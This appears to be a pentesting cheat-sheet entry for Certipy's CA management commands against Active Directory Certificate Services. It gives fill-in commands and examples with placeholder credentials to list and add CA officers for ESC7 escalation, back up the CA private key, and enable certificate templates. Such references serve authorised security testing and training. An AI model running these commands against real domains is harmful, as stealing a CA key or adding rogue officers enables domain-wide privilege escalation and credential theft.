Certipy CA Management

Enumerate and manipulate the certificate authority itself: list officers (ESC7), backup the CA private key, add/remove officers and managers, list templates available on the CA. Required for ESC7 escalation chains.

Tool
certipy
Category
Credential Attacks / ADCS (Certificate Abuse)
Platform
linux
Requires
password
Protocols
LDAP, RPC

Open in Command Manager

Syntax

Angle-bracket tokens are placeholders — replace them with your target's values, or open this command in the app to fill them in and copy the result.

certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -list-officers

Credential variants

The same attack using a different authentication material.

Backup CA Key requires password

certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -backup

Add Officer (ESC7) requires password

certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -add-officer <new_officer>

List Templates requires password

certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -list-templates

Enable Template requires password

certipy ca -u '<user>@<domain>' -p '<password>' -dc-ip <dc-ip> -ca '<ca_name>' -enable-template '<template>'

Examples

certipy ca -u 'jdoe@corp.local' -p 'Password123!' -dc-ip 10.10.10.10 -ca 'CORP-CA' -list-officers
certipy ca -u 'jdoe@corp.local' -p 'Password123!' -dc-ip 10.10.10.10 -ca 'CORP-CA' -enable-template 'SmartcardLogon'

Tags

certipy adcs esc7 ca officer backup

References